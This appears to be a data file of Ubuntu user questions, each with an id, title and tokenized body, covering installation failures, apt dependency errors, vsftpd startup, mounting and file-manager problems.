430666	installing ubuntu base system in home folder as non-root	i do n't have root acess to a server which is running centos . i need a minimal ubuntu chroot environment in my $ home . ( just the apt-get , repositories etc to install packages and run them in terminal . display is not needed ) i was looking around the internet to find any information on this but most of the tutorials require root access . how can i do this ?
430669	ubuntu 12.04 lts & 13.10 not installing - ip through dhcp not working	i have this odd issue . i ca n't install 12.04lts or 13.10 ( both server ) on my server . during the 'getting ip from dhcp ' processes , the installation ca n't optain an ip address . cable is fine , eth0 is 'recognized ' by the installer ... never had such an issue , any input ? thanks martin
430678	mount partition sdb get message permission denied ?	i have 2 server with different ubuntu version , first server use ubuntu 8.04 and second server use ubuntu 12.04 , now i want to use 2 hdd in first server ubuntu ver 8.04 , so second server not function anymore just i take hdd in second server and i put in first server.. if i use fdisk-l all device has display on terminal , but i cant mount sdb5 to home , sdb5 is ext4 file system . i am trying mount sdb to directory home . but i got result message like this bash : /dev/sdb5 : permission denied i use this command to mount partition /dev/sdb5 on /home/datadosen ext4 why i get permission denied even i already use chmod -r 777 in my directory home ? thanks
430680	ecryptfs issues	i 'm having two problems with ecryptfs in how i want/expect it to work . i 'm retrieving the sig remotely so that it never exists on the local drive - to protect against someone walking away with the drive and easily getting the data . however ... 1 ) the mount command is not honoring `` no-sig-cache '' . so even though i 've retrieved the key in a script and destroyed any evidence of it once done - the mount still wants it in the .ecryptfs directory . even using the option to ignore . 2 ) it also seems to ignore the -n flag ( do not write to /etc/mtab ) and still writes all of the mounting information and displays it when someone runs the mount command to view what is mounted . what the heck is the point of encryption if the key is openly displayed ? ? do i need to look at another solution ?
430682	wc prints a byte count for a nonexistent process	i came across a program called wc , which prints the number of bytes , words , and lines in files . now my intention is to use it to determine if a process is actually running on my computer . if it is , it should print the number of bytes in the running process . otherwise it should print 0 . but i can use a fictitious process and it still prints bytes : $ ps -ef | grep dfdsfdf | wc -c 74 where is that 74 coming from ?
430683	how can i push screen savers with extention .scr files to all ubuntu machines which are added in a domain in windows 2003	i configured a domain a windows2003 machine and added many ubuntu machine to this domain . how can i push screen savers .scr file to all these ubuntu client machines from domain
430684	can not install libgles2-mesa-dev	when i try this following commands on ubuntu 12.04 : sudo apt-get install libgles2-mesa-dev-lts-raring i get the following output : the following packages have unmet dependencies : libgles2-mesa-dev-lts-raring : depends : libgles2-mesa-lts-raring ( = 9.1.7-1ubuntu2~precise1 ) but it is not going to be installed depends : libegl1-mesa-dev-lts-raring but it is not going to be installed i tried sudo apt-get -f install commands as well it did not work either , i followed the link : how do i resolve unmet dependencies ? still i could not get it fixed , can someone help me ? thank you in advance
430688	error while apt update	w : gpg error : http : //deb.opera.com stable inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey e585066a30c18a2b w : duplicate sources.list entry http : //deb.opera.com/opera/ stable/non-free i386 packages ( /var/lib/apt/lists/deb.opera.com_opera_dists_stable_non-free_binary-i386_packages ) how to resolve this error while updating ?
430692	how can i create a deb package with 'folders ' and files in it	i have some files that need to be installed in /usr/share/wallpapers when the deb package is installed . i have created the changelog , control files etc however i dont know how to put the files in it . i have tried using dh_install however i get cp can not stat directory debian/tmp//usr/share/wallpapers . how can i go about extracting the wallpapers from the deb file to /usr/share/wallpapers
430699	chowned /usr to myself , how to recover ?	i accidently ran chown myname /usr -r and now the login screen wo n't show up ! i have tried various things in the root terminal , but nothing works . what can i do ?
430702	remove a terminal command	is it possible to remove a terminal command ? for example , if there was a command call lookup ( not an alias ) , how would i go about removing it ?
430705	how to use apt-get to download multi-arch library ?	is it possible to force apt-get to download a multi-architecture binary of the library i want to install ? or is apt-get not the right tool for this ?
430706	installing autotools , autoconf	i am a new ubuntu user , i need to install autotools , when i search on the internet various ways are given that do ./configure and stuff . please guide me on how to install autoconf , autotools etc on my system . a step by step guidance would be very helpful
430713	ubuntu 13.10 can not download files with firefox after 7 march 2014 update	after today update i cant seem to download any files using firefox . i can still download and directly with the `` open with '' even the extension downthemall and flashgot is working . other browser also works fine ( chromium ) . all i get is the download dialogue , click ok and nothing , no error , no download started , nothing ... . anyone can help ?
430714	deb file not downloading on proxy	i am trying to install an app named xchat . during the installation it gets stuck and shows following error : err http : //archive.ubuntu.com/ubuntu/ precise/main libsexy2 amd64 0.1.11-2build2 403 forbidden failed to fetch http : //archive.ubuntu.com/ubuntu/pool/main/libs/libsexy/libsexy2_0.1.11-2build2_amd64.deb 403 forbidden e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing i think that this file can not be downloaded on proxy . how do i manually install it ? or is there any workaround for this ?
430715	ubuntu 12.04 jumps straight to bios when booting	so i tried installing ubuntu 12.04 lts onto my new machine , which i 've just built and it worked just fine . i then swapped the mainboard and cpu with another pair of these to see the difference in power usage . however with the new setup i could n't even get the machine to boot , it jumped right into the bios and would n't from neither of my three hdds . so i then tried reinstalling ubuntu completely from scratch and removed 2 the hdds , and installed it from my usb stick which i used before to the one left hdd . the installation gave me no error whatsoever , however the problem still remained . so i went further and read in another thread to install boot-repair to maybe fix a problem with the bootloader . this also worked just fine , when completed it said `` any errors have been fixed '' or something along those lines . my problem , however , still remains . i get now error message at all , so i 'm asking , is there any place where i can find some kind of boot log to narrow down my problem ?
430716	is it ok to just add a script to rc6.d ?	i just made a script to backup my files at shutdown and added it to init.d then linked it to rc6.d and i gave it the prefix or runlevel of `` k01myscript '' . the question is , will it cause any problem with my system ? i have been testing it and it was working , i am just not sure if it will do some damage to the system in the long run .
430721	ubuntu 12.04 installation hangs after first two screens	i 'm having a strange issue while trying to install ubuntu 12.04.4 ( 64bit ) to my system ( preferably to the ssd ) . when i boot from dvd/usb i get to the installer , after choosing my language and choosing if i want to install 3rd party software ( mp3-codec ) i click on next . from now on nothing more happens , the spinning wheel appears and stays for unlimited time ( waited already up to 20mins ) . i 'm still able to move the window , open preferences and stuff but the installer stays at this screen . my system : i7 4771 , ga-z87-hd3 , 32gb 1333mhz ram , multiple hdds , one ssd what 's also installed is a wlan-card and a sound-card i already retried with the following settings/setup : optimized defaults loaded , boot from usb , only one hdd and ssd attached , soundcard removed : still hanging optimized defaults loaded , boot from dvd , only one hdd and ssd attached , soundcard removed : still hanging my settings loaded ( with one raid1 setup ) , boot from usb , all hdds and ssd attached , soundcard removed : still hanging optimized defaults loaded , boot from dvd , only one hdd attached , soundcard removed : could get further but aborted because i want to install to ssd i really want ubuntu to be installed and want to replace windows what could be the cause of this issue ?
430726	how can i install the alcatel l100 3g usb modem working in 12.04 lts ?	how can i install the alcatel l100 3g usb modem working in 12.04 lts ?
430727	can i show the native ubuntu package version of a program for that a never version is installed from a ppa ?	so lets say i have a beta version of a program installed via ppa and want to know the version of the official version that ships with ubuntu . the only way i know is going to the ubuntu package search website and searching for the package . is there a simple console command to do it ?
430730	current state of pulseaudio 4.0 and crackling sound ( 13.10 )	i recently installed ( k ) ubuntu 13.10 , and my audio started to crackle randomly ( i have an x-fi surround 5.1 pro usb connected to an analog 5.1 speaker set ) . in one week of use now , i managed to have decent audio only in two situations ( say 1 movie , 1 spotify listening session ) over hundreds of attempts and reboots . i searched online for solutions ( which most commonly were discussed in the period aug13 - > dec13 ) and , in particular , the most advised workarounds i could find were make pulseaudio using the older scheduling via the substitution load-module module-udev-detect tsched=0 of the line load-module module-udev-detect in /etc/pulse/default.pa force low latency on program execution $ pulse_latency_msec=30 programtorun in both cases , as happened to several other users around on forums , cracklings have n't stopped . question : what is the current state ( mar14 ) in terms of this ( common ) crackling issue ? can i rollback to older pulseaudio versions ? if i remember correctly i 've not been having any issue in my previous installation ( ubuntu 12.10 ) . any help appreciated
430731	is it harmful not to restart immediately after an update	often my ubuntu 12.04 notifies for available updates . sometimes it asks to restart and gear icon on top right corner for system settings becomes red . usually i ignore the restart request while remain busy with work . should i restart my system immediately ? can it cause any harm due to delay ?
430732	trouble with runing vsftpd server ubuntu 12.04 tls	hi , i have downloaded and installed the vsftpd 2.3.5 but when i check if it is running i get : root @ ubuntu : /etc/init.d # chkconfig vsftpd vsftpd off chkconfig vsftpd on generates lots of this : root @ ubuntu : /etc/init.d # chkconfig vsftpd on insserv : warning : script 'k01acpi-support ' missing lsb tags and overrides the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'vsftpd ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `vsftpd' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `vsftpd' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'network-manager ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `network-manager' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `network-manager' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'rfkill-restore ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `rfkill-restore' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `rfkill-restore' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'atd ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `atd' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `atd' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'plymouth-stop ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `plymouth-stop' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `plymouth-stop' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'passwd ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `passwd' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `passwd' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'anacron ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `anacron' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `anacron' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'failsafe-x ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `failsafe-x' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `failsafe-x' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'resolvconf ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `resolvconf' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `resolvconf' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'alsa-store ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `alsa-store' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `alsa-store' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'plymouth-log ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `plymouth-log' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `plymouth-log' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'network-interface ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `network-interface' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `network-interface' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'plymouth-upstart-bridge ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `plymouth-upstart-bridge' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `plymouth-upstart-bridge' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'acpid ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `acpid' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `acpid' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'friendly-recovery ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `friendly-recovery' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `friendly-recovery' the script you are attempting to invoke has been converted to an upstart job , but lsb-he insserv : warning : script 'k01acpi-support ' missing lsb tags and overrides the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'vsftpd ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `vsftpd' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `vsftpd'ader is not supported for upstart jobs . insserv : warning : script 'hostname ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `hostname' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `hostname' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'udev-fallback-graphics ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `udev-fallback-graphics' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `udev-fallback-graphics' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'plymouth-splash ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `plymouth-splash' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `plymouth-splash' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'console-setup ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `console-setup' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `console-setup' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'procps ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `procps' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `procps' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'cups ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `cups' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `cups' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'rfkill-store ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `rfkill-store' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `rfkill-store' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'udevtrigger ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `udevtrigger' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `udevtrigger' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'nmbd ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `nmbd' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `nmbd' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'alsa-restore ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `alsa-restore' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `alsa-restore' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'hwclock-save ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `hwclock-save' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `hwclock-save' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'cron ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `cron' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `cron' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'irqbalance ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `irqbalance' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `irqbalance' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'smbd ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `smbd' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `smbd' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'lightdm ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `lightdm' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `lightdm' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'dmesg ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `dmesg' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `dmesg' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'network-interface-security ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `network-interface-security' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `network-interface-security' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'dbus ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `dbus' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `dbus' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'avahi-daemon ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `avahi-daemon' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `avahi-daemon' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'udev-finish ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `udev-finish' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `udev-finish' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'plymouth-ready ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `plymouth-ready' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `plymouth-ready' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'rsyslog ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `rsyslog' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `rsyslog' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'apport ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `apport' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `apport' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'ufw ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `ufw' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `ufw' insserv : warning : script 'acpi-support ' missing lsb tags and overrides the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'udevmonitor ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `udevmonitor' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `udevmonitor' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'setvtrgb ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `setvtrgb' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `setvtrgb' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'binfmt-support ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `binfmt-support' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `binfmt-support' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'plymouth ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `plymouth' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `plymouth' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'modemmanager ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `modemmanager' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `modemmanager' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'bluetooth ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `bluetooth' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `bluetooth' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'module-init-tools ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `module-init-tools' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `module-init-tools' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'hwclock ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `hwclock' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `hwclock' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'udev ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `udev' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `udev' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'whoopsie ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `whoopsie' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `whoopsie' the script you are attempting to invoke has been converted to an upstart job , but lsb-header is not supported for upstart jobs . insserv : warning : script 'network-interface-container ' missing lsb tags and overrides insserv : default-start undefined , assuming empty start runlevel ( s ) for script `network-interface-container' insserv : default-stop undefined , assuming empty stop runlevel ( s ) for script `network-interface-container' i have also tryied this : root @ ubuntu : /etc/init.d # status vsftpd vsftpd stop/waiting root @ ubuntu : /etc/init.d # start vsftpd vsftpd stop/pre-start , process 6800 root @ ubuntu : /etc/init.d # status vsftpd vsftpd stop/waiting ** recently i went back to default config file ( found on the net ) . the question : how to start it as default with start of the system ? how to start it in general ? when i try to run it i get : ** root @ ubuntu : /etc/init.d # vsftpd 500 oops : vsftpd : not configured for standalone , must be started from inetd root @ ubuntu : /etc/init.d # what is wrong ? ps . i have also tryied something with ln ... . but as a result i am here asking you for help .
430733	nautilus history	i want to know does nautilus maintain any navigation history file of visited folders . if yes then where it is storing its history ? if not then is it possible to monitor the nautilus either using script or using any packages and create a history file ?
430734	increasing size of virtual machine	i have first tried other question and forum but they are too complicated for me . i want detailed steps . i have virtual box 4.3.8 in kubuntu 13.10 and i am running windows 7 in virtual box . i have 25 gb vdi file . i want to increase to 35gb .
430741	powering up r51 & z545 need help with onekey theater	i have 2 ibms . my r51 will power up but nothing is working , such as the cd-rom , and the screen stays blacked out , but my fan is running and the indicator lights are working . it worked perfectly yesterday and today , any ideas ? my other is a z565 and the one key theatre just wont work . it just quit one day , everything works but that . answers please on either .
430743	how to export from digikam to google+	digikam is an excellent photo management program which has built in support to easily export images to picassaweb . picassa is now owned by google , who are deprecating it in favour of google plus . how can we easily use digikam to export to google plus ? ( google+ )
430744	how to know my commands history	i know that i can easily know my commands history by just running the command history . but two major consequences raise here : history -c command will just flush the history a command with space before will not stored in the history so if i run the command history -c or a command with space before or other commands such as ^bad^good as @ avinashraj stated , thus i ca n't reshow them using the history command . so is there another way to know all commands ran before ? ! ! also the the marked as duplicate sure will not answer my question . it 's just a monitoring to terminal and not command history .
430747	control nuvola player via keyboard shortcuts	i just installed nuvola player on ubuntu 12.04 to listen to my google play music and so far i really like this player . the only problem that i have with this program , is that it only recognizes the control shortcuts ( e.g . alt + right to skip current track ) when i 'm on the same workspace as the nuvola player . this makes those shortcuts pretty senseless . is there a way make the shortcuts work , even if i 'm on a different workspace ? note : i do not have any media keys on my keyboard that i could use
430753	i want to reinstall my ubuntu , and i want to delete my partitions but i do n't know if there were any recovery partitions installed	so , i installed ubuntu and i have the problem of `` running on low graphics mode '' . i 've tried every advice to fix this , but none of them seem to work . i want to reinstall ubuntu , as i think i may have done something wrong while installing . for that i have to delete my ubuntu partitions , and i 've found the main one . the problem is , i 'm running dual boot with windows and i have three recovery partitions and one primary beside the ones from windows and ubuntu . what i would like to know is , if ubuntu creates any recovery partitions while installing , or if i just have to delete the main one ( of ubuntu , of course ) and it 's done . here it is an image of my partitions . the one of `` efi '' i know i must not delete it . the others read like this : '' good functioning state ( recovery partition ) '' '' good functioning state ( recovery partition ) '' '' good functioning state ( primary partition ) '' '' good functioning state ( recovery partition ) '' ( f : ) ( ubuntu ) `` good functioning state ( primary partition ) '' ( d : ) ( windows ) `` good functioning state ( primary partition ) '' ( c : ) ( windows ) `` good functioning state ( boot , ... , primary partition ) '' i know i must delete the `` f : '' one , but i do n't know about the other partitions as they have no system file stated . could they be from ubuntu ? thank you in advance !
430756	can i manage dpkg-installed package with apt-get ?	at the very beginning after i set up my ubuntu 12.04 , i installed webmin ( dpkg -s webmin reports the version to be 1.610 ) by first downloading the .deb file with wget and then running dpkg -- install webmin_1.610_all.deb , according to the instructions on webmin . later , i found that i prefer to use apt-get to manage as much packages as possible , so that i can manage them in a unified way . is it possible ( or does it make sense at all to ask in this way ) to make apt-get to manage this webmin package installed with dpkg ? i understand there is a apt repository and the latest version is 1.67 . if so , how to do that ? thanks in advance .
430757	nvidia x server settings wont set my graphic to maximum performance	it just wont set it and that 's it . i see my pc is struggling with graphic . my graphic card is not that bad . nvidia gts250 256bit 1gb ddr3 . but i constantly suffer from bad graphic performance . when i go set it in nvidia panel to maximum performance it says that my graphic than starts working on graphic clock 750mhz memory 2200mhz and processor 1850mhz . when it 's in auto mode it 's set to graphic clock 300mhz memory 200mhz and processor 600mhz . but i do n't see any changes at all , it 's just like settings are not applied . and even if i overload my pc to the max , it still works the same on auto and on performance . and thermal settings shows just 40c . i know it should n't be like that beacuse on windows it works much faster and when i overload it thermal settings goes to 80c . im using nvidia 331.20 drivers on ubuntu 12.04 x86_64 with gnome classic . when i do uninstall of drivers my pc runs much faster but than some programs do n't work .
430759	error crawling with nutch	when i run : bin/nutch crawl urls -depth 3 -topn 5 -solr [ http : //localhost:8983/solr ] i got : solrindexwriter solr.server.url : url of the solr instance ( mandatory ) solr.commit.size : buffer size when sending to solr ( default 1000 ) solr.mapping.file : name of the mapping file for fields ( default solrindex-mapping.xml ) solr.auth : use authentication ( default false ) solr.auth.username : use authentication ( default false ) solr.auth : username for authentication solr.auth.password : password for authentication exception in thread `` main '' java.io.ioexception : job failed ! at org.apache.hadoop.mapred.jobclient.runjob ( jobclient.java:1357 ) at org.apache.nutch.indexer.indexingjob.index ( indexingjob.java:123 ) at org.apache.nutch.indexer.indexingjob.index ( indexingjob.java:81 ) at org.apache.nutch.indexer.indexingjob.index ( indexingjob.java:65 ) at org.apache.nutch.crawl.crawl.run ( crawl.java:155 ) at org.apache.hadoop.util.toolrunner.run ( toolrunner.java:65 ) at org.apache.nutch.crawl.crawl.main ( crawl.java:55 ) how can i fix this ?
430764	limited desktop environments seen at logon	whenever i log on and i want to change my desktop environment.i click on the button to change my environment.i have many desktop environments almost 10-12.it is arranged in alphabetical order.so u comes towards the end.i want to use ubuntu desktop environment but i am not able to scroll down the list.why is this so , can i use ubuntu now or not ?
430766	users in mysql have too many rights	i finally found out how to install phpmyadmin and get a working internet connection in virtual box after a lot of research . now , i addes users and gave them specific rights for testing purposes . the problem is when i test the privileges out it seems like they can do anything they want . if i revoke the right to delete databases they can still do it even though i did flush privileges ; after .
430769	ca n't reinstall nautilus after using nemo	i had for a while been using nemo as my file manager under unity ( ubuntu 13.10 ) , following the instructions here . a few weeks ago , nemo stopped handling the desktop , and i was left with a black space , with no launchers , and nothing happening on right-click . i thought this was probably due to the slightly hack-y nature of using nemo outside of cinnamon , so i reverted the changes ( following the article linked above ) , and when that did n't solve the problem , tried removing and reinstalling first nautilus , and then unity ( using lubuntu-desktop in the meantime ) . now , with unity reinstalled , i 'm back in the same position ( blank desktop ) , but also find that i ca n't install , or use nautilus eoin @ desktop : ~ $ nautilus the program 'nautilus ' is currently not installed . you can install it by typing : sudo apt-get install nautilus eoin @ desktop : ~ $ sudo apt-get install nautilus reading package lists ... done building dependency tree reading state information ... done nautilus is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . interestingly , i can uninstall , and reinstall nautilus : eoin @ desktop : ~ $ sudo apt-get remove nautilus reading package lists ... done building dependency tree reading state information ... done the following packages will be removed nautilus 0 upgraded , 0 newly installed , 1 to remove and 5 not upgraded . after this operation , 4,196 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 393663 files and directories currently installed . ) removing nautilus ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for gnome-menus ... processing triggers for mime-support ... eoin @ desktop : ~ $ nautilus the program 'nautilus ' is currently not installed . you can install it by typing : sudo apt-get install nautilus eoin @ desktop : ~ $ sudo apt-get install nautilus reading package lists ... done building dependency tree reading state information ... done suggested packages : gnome-sushi the following new packages will be installed nautilus 0 upgraded , 1 newly installed , 0 